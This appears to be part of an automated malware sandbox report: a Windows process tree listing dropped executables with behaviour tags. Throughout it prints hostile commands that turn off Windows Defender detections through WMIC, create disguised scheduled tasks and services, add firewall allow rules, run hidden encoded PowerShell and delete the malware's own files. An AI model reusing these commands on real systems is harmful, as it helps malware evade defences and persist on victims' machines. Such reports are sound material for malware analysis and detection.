C:\ProgramData\8626517.exe"C:\ProgramData\8626517.exe"10⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
PID:5180 -
C:\Users\Admin\Documents\xMG1YvfSVxm8eGMk6qzGDXsN.exe"C:\Users\Admin\Documents\xMG1YvfSVxm8eGMk6qzGDXsN.exe" /mixtwo9⤵PID:6996
-
C:\Users\Admin\Documents\4J_1KMFJgm5oelcgvSUkuzC9.exe"C:\Users\Admin\Documents\4J_1KMFJgm5oelcgvSUkuzC9.exe"9⤵PID:11016
-
C:\Users\Admin\AppData\Local\Temp\is-V6JFQ.tmp\4J_1KMFJgm5oelcgvSUkuzC9.tmp"C:\Users\Admin\AppData\Local\Temp\is-V6JFQ.tmp\4J_1KMFJgm5oelcgvSUkuzC9.tmp" /SL5="$1071E,506127,422400,C:\Users\Admin\Documents\4J_1KMFJgm5oelcgvSUkuzC9.exe"10⤵PID:11204
-
C:\Users\Admin\AppData\Local\Temp\is-6DLA5.tmp\Chmenka.exe"C:\Users\Admin\AppData\Local\Temp\is-6DLA5.tmp\Chmenka.exe" /S /UID=12411⤵
- Drops file in Drivers directory
- Adds Run key to start application
- Drops file in Program Files directory
PID:13144 -
C:\Program Files\Windows Security\LVPGENIUOO\IDownload.exe"C:\Program Files\Windows Security\LVPGENIUOO\IDownload.exe" /VERYSILENT12⤵PID:8020
-
C:\Users\Admin\AppData\Local\Temp\is-O26LI.tmp\IDownload.tmp"C:\Users\Admin\AppData\Local\Temp\is-O26LI.tmp\IDownload.tmp" /SL5="$107A8,994212,425984,C:\Program Files\Windows Security\LVPGENIUOO\IDownload.exe" /VERYSILENT13⤵
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
PID:10396 -
C:\Program Files (x86)\IDownload\IDownload.App.exe"C:\Program Files (x86)\IDownload\IDownload.App.exe" -silent -desktopShortcut -programMenu14⤵
- Drops desktop.ini file(s)
- Drops file in Program Files directory
- Drops file in Windows directory
PID:11200 -
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\3y-ujjsh.cmdline"15⤵PID:11316
-
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF317.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCF316.tmp"16⤵PID:18748
-
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exedw20.exe -x -s 138415⤵PID:7868
-
C:\Users\Admin\AppData\Local\Temp\69-6b3b1-e43-93b9c-8ac0f6df16aab\Wesefesikae.exe"C:\Users\Admin\AppData\Local\Temp\69-6b3b1-e43-93b9c-8ac0f6df16aab\Wesefesikae.exe"12⤵
- Checks computer location settings
PID:10296 -
C:\Users\Admin\AppData\Local\Temp\c5-a3148-a84-a9cb4-2cb93ad848d04\SHexeshushufi.exe"C:\Users\Admin\AppData\Local\Temp\c5-a3148-a84-a9cb4-2cb93ad848d04\SHexeshushufi.exe"12⤵PID:6004
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\lrwnwo5b.n3g\GcleanerEU.exe /eufive & exit13⤵PID:17884
-
C:\Users\Admin\AppData\Local\Temp\lrwnwo5b.n3g\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\lrwnwo5b.n3g\GcleanerEU.exe /eufive14⤵PID:7396
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\osydudvl.opm\installer.exe /qn CAMPAIGN="654" & exit13⤵PID:18672
-
C:\Users\Admin\AppData\Local\Temp\osydudvl.opm\installer.exeC:\Users\Admin\AppData\Local\Temp\osydudvl.opm\installer.exe /qn CAMPAIGN="654"14⤵PID:11512
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\i4xtgbvd.kn5\anyname.exe & exit13⤵PID:19136
-
C:\Users\Admin\AppData\Local\Temp\i4xtgbvd.kn5\anyname.exeC:\Users\Admin\AppData\Local\Temp\i4xtgbvd.kn5\anyname.exe14⤵PID:11076
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ukygpvow.t5e\gcleaner.exe /mixfive & exit13⤵PID:18804
-
C:\Users\Admin\AppData\Local\Temp\ukygpvow.t5e\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\ukygpvow.t5e\gcleaner.exe /mixfive14⤵PID:11448
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5jrx2ov3.d3n\autosubplayer.exe /S & exit13⤵
- Suspicious use of SetWindowsHookEx
PID:4932 -
C:\Users\Admin\Documents\VgxjiSGx9LEXIJ_mHyRpHj7y.exe"C:\Users\Admin\Documents\VgxjiSGx9LEXIJ_mHyRpHj7y.exe"9⤵PID:7728
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST8⤵
- Creates scheduled task(s)
PID:9916 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST8⤵
- Creates scheduled task(s)
PID:9908 -
C:\Users\Admin\Documents\vtgIjuPpGRvQUrQN1CGwNEFc.exe"C:\Users\Admin\Documents\vtgIjuPpGRvQUrQN1CGwNEFc.exe"7⤵PID:592
-
C:\Users\Admin\AppData\Roaming\2243620.scr"C:\Users\Admin\AppData\Roaming\2243620.scr" /S8⤵PID:8620
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu2026c04e7218e1.exe5⤵
- Suspicious use of WriteProcessMemory
PID:3560 -
C:\Users\Admin\AppData\Local\Temp\7zS833B3CA0\Thu2026c04e7218e1.exeThu2026c04e7218e1.exe6⤵
- Executes dropped EXE
PID:4132 -
C:\Users\Admin\AppData\Local\Temp\is-DU44Q.tmp\Thu2026c04e7218e1.tmp"C:\Users\Admin\AppData\Local\Temp\is-DU44Q.tmp\Thu2026c04e7218e1.tmp" /SL5="$7002E,506086,422400,C:\Users\Admin\AppData\Local\Temp\7zS833B3CA0\Thu2026c04e7218e1.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4508 -
C:\Users\Admin\AppData\Local\Temp\is-1N2I0.tmp\___YHDG34.exe"C:\Users\Admin\AppData\Local\Temp\is-1N2I0.tmp\___YHDG34.exe" /S /UID=burnerch28⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
PID:4944 -
C:\Program Files\Windows NT\AMIYBUYWES\ultramediaburner.exe"C:\Program Files\Windows NT\AMIYBUYWES\ultramediaburner.exe" /VERYSILENT9⤵
- Executes dropped EXE
PID:5284 -
C:\Users\Admin\AppData\Local\Temp\is-G2515.tmp\ultramediaburner.tmp"C:\Users\Admin\AppData\Local\Temp\is-G2515.tmp\ultramediaburner.tmp" /SL5="$7007A,281924,62464,C:\Program Files\Windows NT\AMIYBUYWES\ultramediaburner.exe" /VERYSILENT10⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
PID:5448 -
C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu11⤵
- Executes dropped EXE
PID:5772 -
C:\Users\Admin\AppData\Local\Temp\2f-f7325-54a-8f19c-7df238870272e\Gysafaemura.exe"C:\Users\Admin\AppData\Local\Temp\2f-f7325-54a-8f19c-7df238870272e\Gysafaemura.exe"9⤵
- Executes dropped EXE
- Checks computer location settings
PID:5336 -
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exedw20.exe -x -s 222810⤵PID:12896
-
C:\Users\Admin\AppData\Local\Temp\a6-46991-c2f-6deae-97dfc311aae41\Quvovaekaky.exe"C:\Users\Admin\AppData\Local\Temp\a6-46991-c2f-6deae-97dfc311aae41\Quvovaekaky.exe"9⤵
- Executes dropped EXE
PID:5456 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\dwbcbyr0.1jp\GcleanerEU.exe /eufive & exit10⤵PID:5416
-
C:\Users\Admin\AppData\Local\Temp\dwbcbyr0.1jp\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\dwbcbyr0.1jp\GcleanerEU.exe /eufive11⤵
- Executes dropped EXE
PID:6684 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\cnutfdzt.buo\installer.exe /qn CAMPAIGN="654" & exit10⤵PID:6604
-
C:\Users\Admin\AppData\Local\Temp\cnutfdzt.buo\installer.exeC:\Users\Admin\AppData\Local\Temp\cnutfdzt.buo\installer.exe /qn CAMPAIGN="654"11⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
PID:6148 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\cnutfdzt.buo\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\cnutfdzt.buo\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1631826465 /qn CAMPAIGN=""654"" " CAMPAIGN="654"12⤵PID:9576
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\n1wj1ep0.mci\anyname.exe & exit10⤵PID:6876
-
C:\Users\Admin\AppData\Local\Temp\n1wj1ep0.mci\anyname.exeC:\Users\Admin\AppData\Local\Temp\n1wj1ep0.mci\anyname.exe11⤵
- Executes dropped EXE
PID:7140 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\i04pdczi.s5x\gcleaner.exe /mixfive & exit10⤵PID:6096
-
C:\Users\Admin\AppData\Local\Temp\i04pdczi.s5x\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\i04pdczi.s5x\gcleaner.exe /mixfive11⤵
- Executes dropped EXE
PID:6152 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ql4spmkl.k4l\autosubplayer.exe /S & exit10⤵
- Suspicious use of SetWindowsHookEx
PID:6500 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu2090b5515d63b2.exe5⤵PID:4248
-
C:\Users\Admin\AppData\Local\Temp\7zS833B3CA0\Thu2090b5515d63b2.exeThu2090b5515d63b2.exe6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4564 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu2025d6674aed72ba.exe /mixone5⤵
- Suspicious use of WriteProcessMemory
PID:740 -
C:\Users\Admin\AppData\Local\Temp\7zS833B3CA0\Thu2025d6674aed72ba.exeThu2025d6674aed72ba.exe /mixone6⤵
- Executes dropped EXE
PID:1788 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 6567⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1372 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 6727⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:4448 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 6807⤵
- Program crash
PID:2140 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 7287⤵
- Program crash
PID:4520 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 8887⤵
- Program crash
PID:4456 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu20fdd9ac35a68.exe5⤵PID:1876
-
C:\Users\Admin\AppData\Local\Temp\7zS833B3CA0\Thu20fdd9ac35a68.exeThu20fdd9ac35a68.exe6⤵
- Executes dropped EXE
PID:3224 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu203cdb52ef3c6580d.exe5⤵PID:2828
-
C:\Users\Admin\AppData\Local\Temp\7zS833B3CA0\Thu203cdb52ef3c6580d.exeThu203cdb52ef3c6580d.exe6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4700 -
C:\Users\Admin\AppData\Local\Temp\7zS833B3CA0\Thu203cdb52ef3c6580d.exeC:\Users\Admin\AppData\Local\Temp\7zS833B3CA0\Thu203cdb52ef3c6580d.exe7⤵
- Executes dropped EXE
PID:640 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu20bc9ea26f.exe5⤵PID:3360
-
C:\Users\Admin\AppData\Local\Temp\8E7A.exeC:\Users\Admin\AppData\Local\Temp\8E7A.exe2⤵
- Suspicious use of SetThreadContext
PID:9656 -
C:\Users\Admin\AppData\Local\Temp\8E7A.exeC:\Users\Admin\AppData\Local\Temp\8E7A.exe3⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:10192 -
C:\Users\Admin\AppData\Local\Temp\9794.exeC:\Users\Admin\AppData\Local\Temp\9794.exe2⤵
- Suspicious use of SetThreadContext
PID:9784 -
C:\Users\Admin\AppData\Local\Temp\9794.exeC:\Users\Admin\AppData\Local\Temp\9794.exe3⤵PID:7688
-
C:\Users\Admin\AppData\Local\Temp\AA61.exeC:\Users\Admin\AppData\Local\Temp\AA61.exe2⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:10176 -
C:\Users\Admin\AppData\Local\Temp\BB89.exeC:\Users\Admin\AppData\Local\Temp\BB89.exe2⤵PID:9428
-
C:\Users\Admin\AppData\Local\Temp\BF24.exeC:\Users\Admin\AppData\Local\Temp\BF24.exe2⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:9600 -
C:\Users\Admin\AppData\Local\Temp\1515.exeC:\Users\Admin\AppData\Local\Temp\1515.exe2⤵PID:9828
-
C:\Users\Admin\AppData\Local\Temp\1515.exeC:\Users\Admin\AppData\Local\Temp\1515.exe3⤵
- Adds Run key to start application
PID:8028 -
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Local\bca106d2-155a-4288-a1bc-2ca8798ce8c3" /deny *S-1-1-0:(OI)(CI)(DE,DC)4⤵
- Modifies file permissions
PID:9528 -
C:\Users\Admin\AppData\Local\Temp\1515.exe"C:\Users\Admin\AppData\Local\Temp\1515.exe" --Admin IsNotAutoStart IsNotTask4⤵
- Suspicious use of SetThreadContext
PID:10288 -
C:\Users\Admin\AppData\Local\Temp\1515.exe"C:\Users\Admin\AppData\Local\Temp\1515.exe" --Admin IsNotAutoStart IsNotTask5⤵PID:4576
-
C:\Users\Admin\AppData\Local\744bebc2-f92a-4536-a0ff-9dbeaa32b558\build2.exe"C:\Users\Admin\AppData\Local\744bebc2-f92a-4536-a0ff-9dbeaa32b558\build2.exe"6⤵
- Suspicious use of SetThreadContext
PID:12852 -
C:\Users\Admin\AppData\Local\744bebc2-f92a-4536-a0ff-9dbeaa32b558\build2.exe"C:\Users\Admin\AppData\Local\744bebc2-f92a-4536-a0ff-9dbeaa32b558\build2.exe"7⤵
- Loads dropped DLL
- Checks processor information in registry
PID:10840 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im build2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\744bebc2-f92a-4536-a0ff-9dbeaa32b558\build2.exe" & del C:\ProgramData\*.dll & exit8⤵PID:12816
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im build2.exe /f9⤵
- Kills process with taskkill
PID:13352 -
C:\Windows\SysWOW64\timeout.exetimeout /t 69⤵
- Delays execution with timeout.exe
PID:12440 -
C:\Users\Admin\AppData\Local\744bebc2-f92a-4536-a0ff-9dbeaa32b558\build3.exe"C:\Users\Admin\AppData\Local\744bebc2-f92a-4536-a0ff-9dbeaa32b558\build3.exe"6⤵
- Suspicious use of SetThreadContext
PID:5128 -
C:\Users\Admin\AppData\Local\744bebc2-f92a-4536-a0ff-9dbeaa32b558\build3.exe"C:\Users\Admin\AppData\Local\744bebc2-f92a-4536-a0ff-9dbeaa32b558\build3.exe"7⤵PID:11364
-
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"8⤵
- Creates scheduled task(s)
PID:8720 -
C:\Users\Admin\AppData\Local\Temp\50E6.exeC:\Users\Admin\AppData\Local\Temp\50E6.exe2⤵PID:6020
-
C:\Users\Admin\AppData\Local\Temp\68D4.exeC:\Users\Admin\AppData\Local\Temp\68D4.exe2⤵
- Adds Run key to start application
PID:10112 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\ffihpkvc\3⤵PID:10080
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\oamuufuc.exe" C:\Windows\SysWOW64\ffihpkvc\3⤵PID:9812
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
- Suspicious use of SetThreadContext
PID:9828 -
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" create ffihpkvc binPath= "C:\Windows\SysWOW64\ffihpkvc\oamuufuc.exe /d\"C:\Users\Admin\AppData\Local\Temp\68D4.exe\"" type= own start= auto DisplayName= "wifi support"3⤵PID:6704
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" description ffihpkvc "wifi internet conection"3⤵PID:6264
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" start ffihpkvc3⤵PID:1208
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul3⤵PID:9312
-
C:\Users\Admin\oamuufuc.exe"C:\Users\Admin\oamuufuc.exe" /d"C:\Users\Admin\AppData\Local\Temp\68D4.exe"3⤵PID:5632
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\nhdjuewc.exe" C:\Windows\SysWOW64\ffihpkvc\4⤵PID:5492
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" config ffihpkvc binPath= "C:\Windows\SysWOW64\ffihpkvc\nhdjuewc.exe /d\"C:\Users\Admin\oamuufuc.exe\""4⤵PID:480
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" start ffihpkvc4⤵PID:8112
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1780.bat" "4⤵PID:4160
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul4⤵PID:6032
-
C:\Users\Admin\AppData\Local\Temp\818D.exeC:\Users\Admin\AppData\Local\Temp\818D.exe2⤵
- Loads dropped DLL
PID:8560 -
C:\Users\Admin\AppData\Local\Temp\Q5ucksrMTF.exe"C:\Users\Admin\AppData\Local\Temp\Q5ucksrMTF.exe"3⤵PID:12440
-
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe"4⤵
- Creates scheduled task(s)
PID:13036 -
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\818D.exe"3⤵PID:12496
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK4⤵
- Delays execution with timeout.exe
PID:10608 -
C:\Users\Admin\AppData\Local\Temp\B30E.exeC:\Users\Admin\AppData\Local\Temp\B30E.exe2⤵PID:4508
-
C:\Users\Admin\AppData\Local\Temp\BAC0.exeC:\Users\Admin\AppData\Local\Temp\BAC0.exe2⤵
- Suspicious use of SetThreadContext
PID:9624 -
C:\Users\Admin\AppData\Local\Temp\BAC0.exeC:\Users\Admin\AppData\Local\Temp\BAC0.exe3⤵PID:5256
-
C:\Users\Admin\AppData\Local\Temp\C3F8.exeC:\Users\Admin\AppData\Local\Temp\C3F8.exe2⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:9568 -
C:\Users\Admin\AppData\Local\Temp\E3F5.exeC:\Users\Admin\AppData\Local\Temp\E3F5.exe2⤵PID:6836
-
C:\Users\Admin\AppData\Local\Temp\E761.exeC:\Users\Admin\AppData\Local\Temp\E761.exe2⤵PID:9748
-
C:\Users\Admin\AppData\Local\Temp\E761.exe"C:\Users\Admin\AppData\Local\Temp\E761.exe"3⤵PID:7716
-
C:\Users\Admin\AppData\Local\Temp\F491.exeC:\Users\Admin\AppData\Local\Temp\F491.exe2⤵PID:6192
-
C:\Users\Admin\AppData\Local\Temp\D2B.exeC:\Users\Admin\AppData\Local\Temp\D2B.exe2⤵
- Loads dropped DLL
- Checks processor information in registry
- NTFS ADS
PID:6584 -
C:\ProgramData\SQWM6AN8HIEEB4JT.exe"C:\ProgramData\SQWM6AN8HIEEB4JT.exe"3⤵
- Drops startup file
PID:9052 -
C:\Users\Admin\AppData\Roaming\WinSupport\client32.exe"C:\Users\Admin\AppData\Roaming\WinSupport\client32.exe"4⤵
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:10936 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im D2B.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\D2B.exe" & del C:\ProgramData\*.dll & exit3⤵PID:8188
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im D2B.exe /f4⤵
- Kills process with taskkill
PID:13008 -
C:\Windows\SysWOW64\timeout.exetimeout /t 64⤵
- Delays execution with timeout.exe
PID:18944 -
C:\Users\Admin\AppData\Local\Temp\3749.exeC:\Users\Admin\AppData\Local\Temp\3749.exe2⤵PID:11228
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Browser1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2684 -
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService2⤵
- Drops file in System32 directory
- Checks processor information in registry
- Modifies data under HKEY_USERS
- Modifies registry class
PID:5036
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s WpnService1⤵PID:2628
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s IKEEXT1⤵PID:2344
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s LanmanServer1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2336
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection1⤵PID:1956
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s SENS1⤵PID:1404
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s UserManager1⤵PID:1344
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Themes1⤵PID:1216
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ProfSvc1⤵PID:1096
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Schedule1⤵
- Drops file in System32 directory
- Drops file in Windows directory
PID:1028 -
C:\Users\Admin\AppData\Roaming\ctghuggC:\Users\Admin\AppData\Roaming\ctghugg2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:2144 -
C:\Users\Admin\AppData\Roaming\ctghuggC:\Users\Admin\AppData\Roaming\ctghugg2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:10444 -
C:\Users\Admin\AppData\Roaming\aeghuggC:\Users\Admin\AppData\Roaming\aeghugg2⤵
- Suspicious use of SetThreadContext
PID:10820 -
C:\Users\Admin\AppData\Roaming\aeghuggC:\Users\Admin\AppData\Roaming\aeghugg3⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:16396 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵PID:12952
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe2⤵PID:12692
-
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe"3⤵
- Creates scheduled task(s)
PID:17248 -
C:\Users\Admin\AppData\Local\Temp\PZdhpCrZMxgBhjWOo\wwgpFMiovwBgRpD\CNvEnVd.exeC:\Users\Admin\AppData\Local\Temp\PZdhpCrZMxgBhjWOo\wwgpFMiovwBgRpD\CNvEnVd.exe XY /site_id 668658 /S2⤵
- Drops file in System32 directory
PID:19268 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &3⤵PID:12124
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"4⤵PID:6468
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True5⤵PID:12592
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:7084 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True7⤵PID:14268
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"4⤵PID:6404
-
